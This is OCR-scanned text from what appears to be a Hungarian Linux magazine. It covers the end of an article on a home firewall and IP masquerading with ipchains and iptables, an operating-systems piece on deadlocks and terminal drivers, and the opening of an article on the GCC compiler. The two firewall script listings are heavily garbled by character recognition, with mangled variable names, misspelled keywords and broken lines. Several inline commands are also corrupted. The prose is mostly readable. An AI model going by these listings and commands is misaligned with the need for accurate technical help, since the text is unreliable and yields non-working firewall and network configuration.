jegyeznünk, hogy a 2.4-es rendszermag esetében is van lehető- 
ség az ipchains használatára (ha a magot úgy fordítottuk), 
de akkor csak azéra, egyszerre a kettőt nem használhatjuk! 

Az 1. és 2. listán látható parancsfájlt lefuttatva minden kimenő 
forgalom engedélyezett lesz (azaz a gépünktől kifelé bármi 
elérhető), viszont az összes befelé jövő kérést tiltja (tehát 

a gépünk kívülről elérhetetlen lesz). Egy otthoni rendszer 
számára talán ez a legjobb beállítás. 

Az első parancsfájl az ipchains-t, a második az iptables-t 
használja. Ha nem tudjuk pontosan, hogy Linuxunknak 
melyik lenne a megfelelő, akkor futtassuk le az egyiket, és 

ha egy rakás hibaüzenetet kapunk, valószínűleg a második 
lesz a használható. 

Ezek után térjünk át második témánkra, az internet-megosz- 
tásra, amelyet szintén az ipchains, illetve iptables alkal- 
mazásokkal állíthatunk be. A most bemutatott módszer akkor 
tehet jó szolgálatot, amikor a szolgáltatóktól csak egy IP-címet 
kapunk, de mi a Világhálót több gép számára is elérhetővé sze- 
retnénk tenni. (Ez az úgynevezett álcázás azaz masguerading). 
A lényeg az, hogy mivel csak egyetlen IP-címmel rendel- 
kezünk, a többi gépnek úgynevezett belső címeket osztunk 
ki. Ezek olyan IP-címek, amelyek a 10. x . x . X-es, illetve 

a 192.168 .x . x-es tattományba esnek, és kifejezetten erre 

a célra vannak fenntartva. A Linuxszal felszerelt gép egyfajta 
átjáróként fog szolgálni a többi gép és a külvilág között, tehát 
egyszerre kapcsolódik az Internethez és a belső hálózatunk- 
hoz. Ez azt jelenti, hogy egyaránt rendelkezik egy külső 
(valódi) és egy belső IP-címmel. 

A belső hálózatban lévő gépek az összes kifelé küldendő 
csomagot a linuxos gépnek továbbítják. Ekkor egy kicsit 
ellentmondást nem tűrő lépés következik, ugyanis a csomag 
fejléce átírásra kerül: a forrás IP-címét a Linux kicseréli a saját 
külső IP-címére. Erre azért van szükség, mert egy belső IP- 
címet tartalmazó csomag nem kerülhet ki a Világhálóra, az 
ilyeneket egyetlen útválasztó vagy átjáró sem továbbíthatja. 
Amikor pedig megérkezik a válaszcsomag (például egy belső 
gépről lekért weboldal), a Linux a cél IP-címét cseréli ki a 
megfelelő gép belső IP-címére, és beengedi a belső hálózatra. 
A bújtatás segítségével megoldható, hogy a hálózatunkban lévő 
összes gép úgy láthasson kifelé, mintha közvetlenül kapcso- 
lódna az Internethez, viszont kívülről csak Linux-átjárónk 
látszik, mivel egyedül az rendelkezik külső IP-címmel. Ez na- 
gyon jó dolog, mivel belső gépeink nem támadhatóak, másrész- 
ről azonban bosszantó lehet, ha például két gépről egyidejűleg 
szeretnénk NetMeeting-elni, ICO-zni, illetve olyan alkalmazá- 
sokat futtatni, amelyek egyedi IP-cím meglétét követelik meg. 
Nézzük, mire is van szükségünk a linuxos gépen! Először is 
kell egy hálózati kártya, amivel a belső hálózatra csatlakozunk. 
Ha ADSL-en vagy kábeltelevízión keresztüli internetelérésünk 





7. lista Egy célszerű otthoni beállítás ipchainse 


$17 Ann shi 

IPCHAINS-/ sbin/ipchains 

H ha modemmel vagy ADSL-en kereszt 1 

H csatlakozunk, akkor az eth0-t cserőlj k ki 
H pppO-ra! 

WAN IFACE-"ethO" 

LOCAL PORTS- 

s Gat /proc/8yő/net/dovd/ipelocalboctusange 
S FE Üt est TEK 

S: cat /proc/sys/net/ ipv4/ ip: local port range 
5 [etés ss 

ANYWHERE- 0/0 

SIPCHAINS -F 

SIPCHAINS -P forward DENY 

SIPCHAINS -P output ACCEPT 

SIPCHAINS -P input DENY 

STPCHATNS SAlanput del J"ACCRET 

WAN IP-"ifconfig SWAN IFACE Igrep inet 

[cut szd ére 2 ent ed ET! 


[esz SWANETBV Ze echo "SWANN TERCB GE 
scontigured,  aborting." 66 exit 1 


SIPCHAINS -A input -p tcp -s SANYWHERE -d 
5 SWANN TB SEÓOCAT PORTS Ay: 7 ACCBPT 


STPCHAINS A inpút/ p údp "S SANYWHERH -d 
S WAN TB SKOCAUTHORRS E] ACCHET 


SIPCHAINS -A input  -p icmp icmp-type 
"echo reply " s" SANYWHERE — tSSWAN  TEACE 
9.- ACCEPT 


SIPCHAINS -A input  -p icmp icmp-type 
s destination-unreachable -s SANYWHERE 
95-i SWAN IFACE -]j ACCHBPT 

SIPCHAINS -A inpüt /"-p icmp icmp-type 


5time-exceeded -s SANYWHERE 
5 ACCHET 


-i SWAN IFACE 


STPCHAINS CA ünpút vél éj DENNY 


van, akkor egy másik hálózati kártyára is szükségünk lesz. 
Felmerülhet a kérdés, hogy nem lehetne-e ezt csupán egyetlen 
kártyával megoldani? Abban az esetben igen, ha meg tudjuk 
valósítani, hogy a kártya egyidejűleg lássa a modemet és a bel- 
ső hálót is, ugyanis a rendszermag IP-aliassing (IP-álnevesítő) 
szolgáltatásával egy kártyához több IP-címet is rendelhetünk. 
A hálózati kártyákhoz egyébként az ifconfig nevű 
paranccsal rendelhetünk IP-ket. Az első kártya esetében 
például ifconfigethO 10.1.1.1, a másodikhoz például 
ifconfigeth110.1.1.2. Második IP-címet a következő 
módon adhatunk meg: ifconfigethO:110.1.1.3. 

Az utóbbi csak abban az esetben működik, ha a rendszermag 
tartalmazza az IP aliassing szolgáltatást — szerencsére ez a 
legtöbb terjesztés alapmagjában megtalálható. 

A bújtatást a legegyszerűbben a következő módon állíthatjuk 
be: ipchains -A forward -j MASO, illetve iotables 
esetében: iptables -t nat -A POSTROUTING -j 
MASOUERADE. Innentől kezdve a Linuxon átmenő összes 
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2. [lista Egy ügyes otthoni beállítás iptables-re 


Hero 48 

IPTABLES-/sbin/iptables 

H ha modemen vagy ADSL-en kereszt 1 

H csatlakozunk, akkor az eth0-t cserglj k 
t ki pppO-ra! 

WAN IFACE-"etho" 

ANYWHERE-"0/0" 

modprobe ip conntradcieteteje 

SIPTABLES -F 

SIPTABLES -P FORWARD DROP 

SIPTABLES -P OUTPUT ACCEPT 

SIPTABLES -P INPUT DROP 

SIPTABLES -A INPUT -i lo -j ACCEPT 
SIPTABLEG SA SITNPUTMÉD temp 4 iemp type 
S5echo-reply -s $ANYWHERE -i $WAN IFACE 
9.j ACCEPT 

SIPTABLES -A INPUT -p icmp 
sdestination-unreachable -s 
5 SWAN IFACE -]j ACCEBPT 
SIPTABLES -A INPUT -p icmp 
5time-exceeded -s SANYWHERE 
5-j ACCBET 

SIPTABLES -A INPUT -m state state 

ss HOTABKISHED, REA TED - ]  ACCESPTT 
SIPTABLES -A INPUT -m state state NEW 
9-1! SWAN TEACH "]ji; ACCRETT 
SIPTABLES -A INPUT -j LOG -m limit 
5 O/MINÜES s legeptretix "bropbping: a" 
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icmp-type 
SANYWHERE -i 


icmp-type 
-i SWAN IFACE 


MEGÉMEÉG 


csomag fejléce átíródik. Ha a parancs kiadásakor valamiféle 
hibaüzenetet kaptunk, minden bizonnyal nincs a rendszer- 
magunkban ez a szolgáltatás. A legtöbb terjesztés ilyen maggal 
szállítja termékeit. 

Ha látszólag minden rendben van, de mégsem működik a 
dolog, akkor valószínűleg az a gond, hogy ki van kapcsolva 

az úgynevezett IP forwarding. Semmi pánik! Az echo 1 : 
/proc/sys/net/ipv4/ip forward utasítás segítségével 
egyszerűen csak be kell kapcsolnunk. 

Meg kell jegyeznünk, hogy mind az ipchains, mind az 
iptables beállításai elvesznek a rendszer leállításakor, ezért 
ha nem akarjuk minden alkalommal bepötyögni a parancsokat, 
írjuk be valamelyik rendszerindító parancsfájlba! 

A többi gépen a saját belső IP-címükön kívül két dolgot kell 
beállítanunk. Az első, hogy az alapértelmezett átjáró a 
Linuxunk belső IP-címe legyen. Ha az a gép szintén Linux, ezt 
a következőképpen tehetjük meg: route add default gw 
10.1.1.1(a10.1.1.1 helyére értelemszerűen átjárónk belső 
IP-címe kerül). A második a DNS-kiszolgáló, amit a Linux 
esetében a /etc/resolv.conf állományban adhatunk meg a 
nameserver után, például: nameserver 195.72.32.131. 
Ezek után úgy kell látnunk kifelé, mintha közvetlenül kap- 
csolódnánk a Világhálóra. 


Garzó András 

(garzoandointerware.hu) körülbelül három éve foglalkozik 
Linux- és más Unix-rendszerekkel. Legjobban az operációs 
rendszerek lelkivilága érdekli, de nyitott egyéniség. Kedvenc 
étele a palacsinta, és van egy Richard nevű macskája. 
Minden észrevételt, megjegyzést, levelet szívesen fogad. 
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Holtpont kizárva! 


Sorozatunk előző részében már nem maradt hely egy sok fejfájást okozó nehézség 
bemutatására, ezért most rögtön be is pótoljuk a mulasztást. A továbbiakban már 
valóban gyakorlatibb vizekre evezünk, és a beviteli-kiviteli eszközök kezelésével 


foglalkozunk, a terminálokon kezdve a sort. 


nehézséget, amiről most beszélni fogunk, az okozza, 
AA hogy léteznek olyan erőforrások, amelyeket ha egy 

folyamat megkap és elkezd használni, egészen addig 
nem vehetjük el tőle, amíg be nem fejezte a munkáját. Ezek az 
úgynevezett kizárólagos vagy monopol módú erőforrások; 
példaként a nyomtatót lehetne említeni. 
Akadnak azonban megszakítható erőforrások is, amelyek a 
folyamattól bármikor elvehetők, azzal a feltétellel, hogy ugyan- 
abban az állapotban kapják vissza, mint ahogyan elkoboztuk 
tőlük. Jellemzően ilyen erőforrás a memória. Egy folyamatot 
bármikor felfüggeszthetünk, kipakolhatunk a memóriából a 
merevlemezen lévő virtuális memóriába, és az így felszabadult 
memóriaszeletet másvalakinek adhatjuk át. Ezután az eredeti 
folyamatot visszatöltve az ugyanonnan folytathatja a futását, 
ahol abbahagyta. Nyilvánvaló, hogy például a nyomtató 
esetében ezt nem tehetnénk meg. 
Ha megengedjük a monopol módú erőforrások létezését, fel 
kell rá készülnünk, hogy előbb-utóbb valamilyen gond is lesz. 
Kialakulhat az esetenként a folyamatok rejtélyes lefagyásával 
járó rendkívül kellemetlen jelenség, a holtpont. 
Általánosan megfogalmazva: valamely két vagy több folyamat- 
ból álló halmaz akkor juthat holtpontba, ha a benne lévő összes 
folyamat egy olyan eseményre várakozik, amelyet csak egy 
szintén abban a halmazban lévő folyamat idézhetne elő. 
Magyarán: körkörös várakozás van érvényben: , A" folyamat 
vár a ,B"-re, az pedig a , C7-re, a ,C" meg az ,A -ra. 
Zavaros? Nézzünk egy példát! Az első folyamat ki szeretne 
nyomtatni egy állományt a CD-ROM-ról, ezért lefoglalja a 
CD-meghajtót mint erőforrást. Ezután megpróbálja megsze- 
rezni a nyomtatót, de azt egy másik folyamat éppen használja, 
tehát várakoznia kell. Az éppen nyomtató folyamat azonban 
be szeretne valamit tölteni a CD-ről, ami szükséges a további 
adatok kinyomtatásához. A meghajtó viszont már foglalt, ezért 
ő is várakozásra van ítélve. Mindkét folyamat egymásra vár, 
vagyis holtpontról kell beszélnünk. 
Ha még így sem tiszta teljesen, gondoljunk csak a két résszel 
ezelőtt említett étkező filozófusok kérdésére! A filozófusok 
jelen esetben a folyamatoknak, a villák pedig monopol módú 
erőforrásoknak felelnek meg. 
Az operációsrendszer-tervezőket már régóta foglalkoztatja, 
hogy milyen módszerekkel lehetne elkerülni a holtpontok 
kialakulását. Rájöttek, hogy a monopol módú erőforrások 
jelenlétén kívül három további feltételnek is teljesülnie kell, 
hogy holtpont jöhessen létre. Az első az úgynevezett köl- 
csönös kizárás, azaz minden erőforrásnak két állapota lehet: 
vagy hozzá van rendelve valamelyik folyamathoz, vagy 
nincs. A második az, hogy egy folyamat bármikor anélkül 
kérhet egy erőforrást, hogy el kellene engednie egy már ko- 
rábban lefoglaltat. Az utolsó feltétel pedig az előbb már eml[í- 
tett körkörös várakozást követeli meg. Ha ezek közül csak 
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az egyik nem teljesül, sohasem alakul ki holtpont. 

Rengeteg algoritmust kitaláltak, amellyel megakadályozhat- 
nánk bármelyik feltétel teljesülését, ám a Unix-rendszerek 
eléggé sajátos módon oldják meg ezt a nehézséget: egyszerűen 
nem foglalkoznak vele. 

A Unixban ugyanis nincsenek monopol módú eszközök, és 
az operációs rendszer nem is teszi lehetővé a zárolásukat. 
Mégis létezik erre egy módszer: az úgynevezett lezáró (lock) 
állományok. Ha egy eszközre kizárólagos elérést szeretnénk, 
akkor csak egy ilyen állományt kell elhelyezni a megfelelő 
helyre a megfelelő névvel (amely az adott eszközre utal). 

Ez azonban nem az operációs rendszer szolgáltatása! Maga 

a folyamat dönti el, hogy figyelembe veszi-e a lezáró állomá- 
nyokat vagy sem. Ha az utóbbi eset áll fenn, akkor könnyen 
lehet, hogy végeredményül valamiféle szörnyűséget kapunk, 
de holtpont akkor sem alakulhat ki, mivel a kölcsönös kizárás 
feltétele nem teljesül. 

Ennyit a holtpontokról. A továbbiakban a különböző beviteli 
kiviteli eszközök kezelésével foglalkozunk, elsőként a 
terminálokkal. 


Terminálok 

A terminálok olyan eszközök, amelyek lehetővé teszik, hogy a 
felhasználók kapcsolatot tartsanak a számítógéppel, és minden 
számítógép rendelkezik legalább egy ilyennel. Monitorunk és 
billentyűzetünk együttesen szintén egy terminált alkot. A több- 
felhasználós operációs rendszerek (mint például a Linux) ese- 
tében ezt konzolnak nevezik. 

Érdemes megjegyeznünk, hogy a többfelhasználós operációs 
rendszerek esetében a többi rész közül általában a terminál- 
meghajtó kódja a legnagyobb, mégis az egész témakört elin- 
tézzük röpke két oldalon. Ez azzal magyarázható, hogy például 
a folyamatkezelésnél (amelyet több mint két részen át tárgyal- 
tunk) a terminálkezelés elve viszonylag egyszerűbb, de a 
megvalósítás sokkal ,macerásabb", mivel egyrészt egyszerre 
kell kezelni a billentyűzetet és a képernyőt (amelyek külön- 
külön is elég nagy kihívást jelentenek), másrészt ennél az 
eszköz esetében számolni kell egy eléggé beszámíthatatlan 
külső tényezővel is: a felhasználóval. lapasztalatból tudjuk, 
hogy egy rendszer sohasem támaszthat túl nagy követelmé- 
nyeket a felhasználóval szemben, aki akarva-akaratlan min- 
denféle ármánykodásra képes, például felrúgja a bevitelre 
vonatkozó szabályokat, vagy több karaktert ír be, mint 
amennyi egy sorban kifér (vagy amennyit az adott alkalmazás 
fogadni képes) stb. 

Az ilyen helyzeteket a terminálmeghajtónak kell kezelnie, tehát 
gyakorlatilag minden eshetőségre fel kell készülnie. Ha ezt 
nem tenné meg, akkor akár az is előfordulhat, hogy a felhasz- 
náló ügyetlenkedése miatt elszállhat az adott alkalmazás, 
rosszabb esetben talán az egész rendszer is. 





Sokféle színű, illatú, formájú terminál létezik, az operációs 
rendszer szempontjából azonban csak kapcsolódási felületük- 
ben különböznek egymástól (azaz abban, hogy milyen elv 
alapján cserélnek adatot a központi számítógéppel). Mi ezek 
közül most háromfélét említünk meg. 


Tárcím-leképezéses terminálok 

Általában az összes számítógép rendelkezik legalább egy ilyen- 
nel. Ebbe a csoportba tartozik billentyűzet-monitor párosunk 
is. Az ilyen típusú terminálok mindig beépített részét képezik 
a számítógépnek. 

Ez a csoport a nevét onnan kapta, hogy a kijelző egységet 

(a képernyőt) egy úgynevezett video-RAM-on keresztül érhet- 
jük el. Ez nem más, mint egy olyan memóriatartomány, ami 
része a tőmemóriának, és ugyanúgy kell használni (címezni), 
mint a memória bármelyik másik rekeszét. 

A rendszernek tehát csak el kell helyeznie a megjeleníteni 
kívánt szöveget (vagy képet) a memória megfelelő részére, 
ezután az ott tárolt adatot a grafikus kártyán található video- 
vezérlő a monitor számára emészthető videojelekké alakítja át. 
A többi termináltípustól eltérően itt a bevitel teljesen el van 
választva a megjelenítéstől, a billentyűzet közvetlenül az alap- 
laphoz kapcsolódik. Amikor a felhasználó lenyom egy billen- 
tyűt, a billentyűzet belsejében található mikroprocesszor ezt 
érzékeli, és elküldi az adott billentyűhöz tartozó úgynevezett 
scan-kódot. Amint erről az alaplapon található billentyűzet- 
vezérlő értesül, megszakítást vált ki. Ugyanez történik az adott 
billentyű felengedésekor is. 


RS-232 (soros kapujú) terminálok 

Ezek olyan kijelzőből és egy billentyűzetből álló eszközök, 
amelyek a számítógép soros kapujához kapcsolódnak. A soros 
kapu azonban lassú, és csak korlátozott mennyiségben áll ren- 
delkezésre, ezért manapság leginkább csak a távoli, telefonvo- 
nalon és modemen keresztüli elérés biztosítására használják. 


Hálózati és grafikus (X) terminálok 

Ma már ott tartunk, hogy maguk a terminálok is számítógépek 
(esetleg PC-k), amelyek saját processzorral és memóriával ren- 
delkeznek. Megjelentek a grafikus környezettel is megbirkózó 
úgynevezett X-terminálok. Ezek többnyire hálózaton keresztül 
kapcsolódnak a központi számítógéphez. 

Ha karakteres terminált szeretnénk , gyártani" egy, a hálózatba 
kapcsolt PC-ből, csupán egy úgynevezett terminálemulátor 
programot kell rajta elindítanunk, vagyis egy egyszerű telnet 
ügyfelet. A telnet a világ egyik legegyszerűbb hálózati pro- 
tokollja: a lenyomott billentyűket elküldi a kiszolgáló felé, az 
ügyfél pedig megjeleníti a beérkező karaktereket. Az ssh 
(Secure Shell) protokoll már egy kicsit bonyolultabb, habár 
szerepe megegyezik a telnet-ével. A fő különbség annyi, 
hogy az átvitel titkosított, tehát biztonságban érezhetjük 
magunkat a hálózaton hallgatózó fülektől. 

Grafikus terminált lehet készen kapni, de tulajdonképpen bár- 
milyen általános célú számítógép használható erre a célra, ami 
rendelkezik hálózati csatolóval, egérrel, billentyűzettel, és ter- 
mészetesen grafikus megjelenítővel. 

Az X-terminál minden esetben egy X-kiszolgáló nevű alkalma- 
zást futtat, amely a billentyűzetről, illetve az egérről beérkező 
adatokat továbbítja a gazdaszámítógéphez, továbbá fogadja 

az utasításait. Ezek a parancsok viszonylag alacsony szintűek, 
tehát olyasmire kell gondolni, mint egy pont kirajzolása vagy 
egy vonal húzása. 

A gazdaszámítógépen úgynevezett X-ügyfélprogramok futnak. 
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Ezek egyrészt azok, amelyeket a felhasználó a terminálról 
elindít, de a terminál képernyőjén jelennek meg. Másrészt 
X-ügyfélnek számít még az ablakkezelő, amely a terminálon 
megjelenő ablakok létrehozásáért, kinézetéért, mozgatásáért, 
átméretezéséért stb. felel. 

Láthatjuk, hogy mindhárom különböző termináltípust más- 
képpen kell programoznunk. A felhasználói programok azon- 
ban nyilván nem szeretnének olyan dolgokkal törődni, mint 
hogy az őket futtató felhasználó éppen milyen típusú, felbon- 
tású terminál előtt ül. lehát itt is eszközfüggetlen környezet 
létrehozása a cél. 

A továbbiakban nagy vonalakban bemutatjuk a Linuxhoz 
hasonló Unix-rendszerek terminálmeghajtóinak működési 
elvét, főként a tárcím-leképezéses terminálokra kihegyezve. 


Beolvasás a terminálról 

Az első kérdés, amit egy operációs rendszer tervezésekor 
meg kell vizsgálni, az, hogy érdemes-e kettéválasztani a 
beolvasást, illetve a megjelenítést. Logikusnak tűnik, ha azt 
mondjuk, hogy igen, mivel a képernyő és a billentyűzet 
különálló eszköz, ám a Linux mégis együtt kezeli őket. Min- 
denesetre mi most kettéválasztva tárgyaljuk őket, a bevitelen 
kezdve a sort. 

Alapvetően kétféle beviteli módot különböztetünk meg: a 
nyers módct és a feldolgozott vagy a Unix-rendszerek által 
kanonikusnak keresztelt módot. Az első esetben a billentyű- 
zetmeghajtó a beérkezett karaktert egyből továbbítja a felhasz- 
nálói alkalmazások felé. Ez nagyon hasznos például a szöveg- 
szerkesztők esetében, viszont zavaró lehet egy parancsértel- 
mező számára. Ha ugyanis a felhasználó elgépelte a parancsot, 
akkor a BACKSPACE billentyű segítségével a beírt karaktereket 
egészen a rosszul írt részig kitörli, majd onnantól folytatja a 
parancs bevitelét. Nyilvánvaló azonban, hogy a parancsértel- 
mező nem kíváncsi a felhasználó ügyetlenkedéseire, csak a 
kész, kijavított sor érdekli, ezért számára a feldolgozott módú 
bekérés lenne rokonszenvesebb. Szerencsére a Unix-rend- 
szerek tartalmaznak olyan könyvtári eljárásokat (vagy rend- 
szerhívásokat), amelyek segítségével az adatokat mindkét 
módon be lehet kérni. 

A leütött billentyűk összegyűjtéséről a billentyűzetmeghajtó- 
nak kell gondoskodnia, amely a terminálkezelő folyamat 
része. A beérkező karakterek fogadásáról azonban a rend- 
szermag legalján lévő megszakításkezelő gondoskodik, amely 
azt egy ideiglenes tárba (pufferbe) helyezi, majd valamilyen 
úton-módon értesíti a billentyűzetmeghajtót az új karakter 
megérkezéséről. 

A billentyűzet csak a leütött billentyű scan-kódját (tulajdon- 
képpen a leütött billentyű sorszámát) küldi tovább, de ez a 
legtöbb felhasználói alkalmazás számára emészthetetlen, ezért 
a billentyűzetmeghajtónak egy úgynevezett karakterkódot kell 
hozzárendelnie. Ezek közül a legelterjedtebb az ASCII 
(American Code for Information Interchange) kódtáblázat. 

De ennek mi, magyar nyelvterületen élők nem sok hasznát 
vehetjük akkor, ha ékes anyanyelvünkön íródott szövegekkel 
is szeretnénk dolgozni az adott rendszer alatt, mivel az ASCII- 
kódtábla nem tartalmaz ékezetes betűket. Ezért a legtöbb 
operációs rendszer lehetőséget ad arra, hogy maga a felhasz- 
náló határozza meg, milyen táblázat szerint történjen az átala- 
kítás. Ezeket a táblázatokat egyébként billentyűzettérképnek 
vagy kódlapnak is szokás nevezni. 

Ha a bevitel bekérése kanonikus módban Zajlik, a billentyű- 
zetkezelőnek további kihívásokkal kell szembenéznie. Ilyen 
például a visszhangzás megvalósítása, vagyis a leütött billen- 
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tyűknek a képernyőn történő megjelenítése. A gond abban 
gyökeredzik, hogy olyasmire is figyelni kell, hogy a felhasználó 
egy 80 karakteres sorhosszúságú terminálon 80 karakternél 
többet gépel-e be, vagy valamilyen különleges billentyűkombi- 
nációt használ, mint például a soremelést, a BACKSPACE-t vagy 

a ,fájl vége" karaktert. 

Láthatjuk tehát, hogy egy jól működő terminálmeghajtó meg- 
tervezése és elkészítése nem kis feladat. Mindenesetre most 
nagy vonalakban kövessük nyomon, hogyan kér be például 
egy parancsértelmező egy utasítást a felhasználótól! 

Amikor a parancsértelmező várja a felhasználó utasításait, 
olvasni próbál az úgynevezett szabványbemenetről, ami pél- 
dául a konzolon lévő első virtuális terminál esetében /dev/tty1 
(erre a célra egy külön könyvtári eljárás létezik). Azt, hogy 

a szabványbemenetnek megadott eszközfájl alatt pontosan 
melyik eszközt is értjük, a fájlrendszer tudja megmondani, 
ezért a parancsértelmező egy üzenetet küld a fájlrendszerke- 
zelő folyamatnak, ami tartalmazza az eszközfájlt, és egy memó- 
riacímet, ahová a beérkező adat majd kerülni fog. Ezután a 
parancsértelmező blokkol. 

Az eszközfájlok két értéket tartalmaznak: a fő, illetve a mellék 
eszközszámot. Ezek határozzák meg pontosan, hogy melyik 
eszközről is van szó, jelen esetben melyik eszköztől kell vár- 
nunk a bemenetet. Miután a fájlrendszer megállapította, hogy 
a megadott eszközfájlhoz melyik fő, illetve mellék eszközszám 
tartozik, üzenetet küld a terminálkezelőnek, hogy valaki 
bevitelre vár. 

Ez a folyamat azonban a másodperc törtrésze alatt zajlik le, így 
a felhasználó valószínűleg még egy árva billentyűt sem ütött 
le, tehát a terminálkezelő még nem tudja teljesíteni a kérést. 

A fájlrendszer azonban nem blokkol, csupán megjegyzi, hogy 
van itt valahol egy folyamat, amely bevitelre vár, majd folytatja 
a munkát a következő kérés végrehajtásával. A parancsértel- 
mező folyamata azonban egészen addig aludni fog, amíg a kért 
adat meg nem érkezik. 

Amikor leütünk egy billentyűt, két megszakítás is történik: egy, 
amikor lenyomtuk és még egy, amikor felengedtük. A rendszer 
csak azokkal a megszakításokkal foglalkozik, amelyek egy 
billentyű lenyomásakor jönnek létre. Kivételt képeznek ez alól 
a módosító billentyűk (a CIRL és a SHIFT), amelyeknek a 
lenyomását- és felengedését is kezelni kell. 

A beérkező billentyűkódokat a megszakításkezelő fogadja, és 
beteszi egy, a terminálkezelő számára is elérhető memória- 
helyre. Ezután felébreszti a terminál-kezelőt, amely a pillanat- 
nyi billentyűzettérkép és a lenyomva tartott módosító billen- 
tyűk függvényében meghatározza, hogy milyen karaktert kell 
továbbküldenie az alkalmazásnak. 

A feldolgozott beviteli módnál (mint jelen esetben is) a termi- 
nálkezelő addig gyűjti a billentyűzetről érkező karaktereket, 
amíg egy sorvége, fájlvége vagy soremelés karakter nem érke- 
zik. Ha ez bekövetkezik, akkor a beérkezett karaktereket 

a parancsértelmező által kijelölt memóriarekeszbe teszi, majd 
üzenetet küld a fájlrendszernek, hogy a kért művelet befejező- 
dött. Ezután a parancsértelmező felébredhet, és elkezdheti a 
felhasználótól érkezett karakterek feldolgozását. 


A megjelenítés 

A tárcím-leképezéses terminálokon való megjelenítés meg- 
valósítása egyszerűbb a bekérésnél, bár bizonyos tényezők 
ezt is rendkívül túlbonyolíthatják. Például a legtöbb Unix- 
rendszer esetében a konzolra is megadhatunk több virtuális 
terminált, ami azzal jár, hogy a terminálkezelőnek figyelnie 
kell, hogy mindig csak az éppen működő képernyőre írjon. 
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Mi azonban most csak a közvetlen képernyőkiírás mene- 

tét vizsgáljuk. 

Az alkalmazások a printf könyvtári függvény segítéségével 
írhatnak a szabványkimenetre. Hasonlóan a bekéréshez, itt is a 
fájlrendszernek küldünk üzenetet, ami tartalmazza a kimeneti 
eszközfájl nevét, továbbá egy memóriacímet, amelyen a kiíran- 
dó szöveg megtalálható. A terminálkezelőnek a feladata elvben 
annyi, hogy az ezen a memóriacímen található karaktersoro- 
zatot bemásolja a video-RAM-ba, a többit a gép elintézi. 

Ám ez csak látszólag ilyen egyszerű. Gondoskodni kell ugyanis 
a különböző különleges karakterekről és a kilépési szekven- 
ciákról (lásd később) is. A különleges karakterekre a két legjobb 
példa a soremelés (CTRL-]J) és a csengetés (CTRL-G). Az utóbbi 
karakter segítségével csengetéshez hasonló hangot csalhatunk 
ki a hangszóróból. Látható, hogy ez a megjelenítéstől egy 
teljesen különböző világ, ám ennek kezeléséről mégis a termi- 
nálmeghajtónak kell gondoskodnia. 

A soremelésnél előfordulhat, hogy a képernyő aljára értünk, 
és mindent egy sorral feljebb kell görgetnünk. Itt az a gond 
merül fel, hogyha ezt a video-RAM-on belüli adatok ide-oda 
pakolgatásával oldanánk meg, a megjelenítés rettentő lassú 
lenne. Szerencsére egy kis alkatrészes segítségre támaszkod- 
hatunk. A legtöbb videovezérlőnek megmondhatjuk, hogy 

a video-RAM mely pontjától kezdje a megjelenítést. Így ezt 

a mutatót csak egy sorral lejjebb kell állítanunk, és máris 
felszabadul a legalsó sor. Ám ezt nem tehetjük örökké, mert 

a video-RAM mérete véges. Aggodalomra azonban itt sincs 
ok, mert a videovezérlő a video-RAM-ot körkörösen kezelt, 
azaz ha elért a végére, visszatér az elejére, és onnan folytatja 
a megjelenítést. 

Bizonyos alkalmazások igényelik, hogy kicsit nagyobb szabad- 
ságot élvezzenek a megjelenítésben, azaz lehetőségük legyen 
például a kurzor mozgatására vagy a karakterek tulajdonsá- 
gainak (elő- és háttérszínük) megváltoztatására. Ezeket az 
úgynevezett kilépési szekvenciák segítségével érhetik el. 

Egy kilépési szekvencia több karakterből áll, amelyből az első 
mindig az Esc karakter. Ezt követi maga az utasítás, amelyet 

a megjelenítésért felelős kódnak végre kell hajtania. Egy ilyen 
a következőképpen nézhet ki: 


ESCI1L;51H 


Ez a szekvencia a kurzort az 1,1-es helyzetbe (a képernyő bal 
felső sarkába) mozgatja. Ezek az utasítások nem egyszerűek, 
sőt kapcsolóik bizonyos esetekben elhagyhatóak, tehát ezeknek 
a kódoknak az értelmezése nem egyszerű feladat. 

A kilépési szekvenciákat egyébként az ANSI szabvány tartal- 
mazza, tehát sok más operációs rendszer is támogatja őket, 
például a régi MS-DOS is (igaz, csak akkor, ha a rendszer 
indulásakor az ANSI.SYS állományt betöltöttük). 

Ennyit a terminálokról dióhéjban. A következő részben folytat- 
juk a beviteli-kiviteli eszközökkel való ismerkedést. Akkor egy 
viszonylag nagyobb lélegzetvételű témába kezdünk bele, 
méghozzá a lemezmeghajtókkal való ismerkedésbe. 


Garzó András 

(garzoandointerware.hu) körülbelül három éve foglalkozik 
Linux- és más Unix-rendszerekkel. Legjobban az operációs 
rendszerek lelkivilága érdekli, de nyitott egyéniség. Kedvenc 
étele a palacsinta, és van egy Richard nevű macskája. 
Minden észrevételt, megjegyzést, levelet szívesen fogad. 





A GNU Fordítógyújtemény 
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Miután forráskódunkat egy nekünk tetsző szövegszerkesztőben megírtuk, a 
processzor számára is érthető gépi kódra kell lefordítanunk, hogy futtatható 
állományt kapjunk. Ehhez használhatjuk a GNU Fordítógyűjteményt. 


sábító lenne arra gondolni, hogy a GCC (Linking) a 
GNU C Compliler szavak rövidítése, azaz nem más 
lehet, mint a GNU C Fordító. Ez néhány éve még igaz 
volt, de alkotói a megváltozott helyzetnek megfelelően mára 
más nevet adtak neki: a GCC az angol GNU Compile Collec- 
tion szavakból alkotott mozaikszó, ami arra utal, hogy a GNU 
CC nem egyetlen fordítót tartalmaz, hanem különböző progra- 
mozási nyelveket képes gépi kódra átfordítani, többek között 
Linux-környezetben. De ha megfelelően van lefordítva, akkor 
keresztfordítóként (cross compiler, azaz több felületen működő 
fordítóként) is képes üzemelni, ami azt jelenti, hogy nemcsak 
a gépünkben lévő, hanem másfajta processzorcsaládokra is 
programokat tudunk vele fordítani. Például egy Intel pro- 
cesszort tartalmazó x86-os gépen olyan gépi kódot állíthatunk 
elő, ami Alpha processzorokon is képes lesz futni. Több Linux- 
terjesztés GCC fordítója alapértelmezetten nem képes ilyen 
átfordításra, ezért ilyenkor a GCC-csomagot a keresztfordítás- 
nak megfelelő beállításokkal újra kell fordítani. 

A FreeBSD-hez, az Emacs lisp könyvtárakhoz és a Linux-rend- 
szermaghoz hasonlóan a GCC is a bazár stílusú fejlesztési 
modell szerint készül, így nevezte Eric S. Raymond a nyílt 
forráskódra alapozott programírást. Hogy egyértelmű legyen 
a szöveg, a továbbiakban a fájlokat tartalmazó könyvtárakat 
mappáknak fogom nevezni, hogy megkülönböztessem őket 

a tárgykódot tartalmazó könyvtáraktól. 

Ahogy egy bazárban illik, a GCC készítői a forráskódot min- 
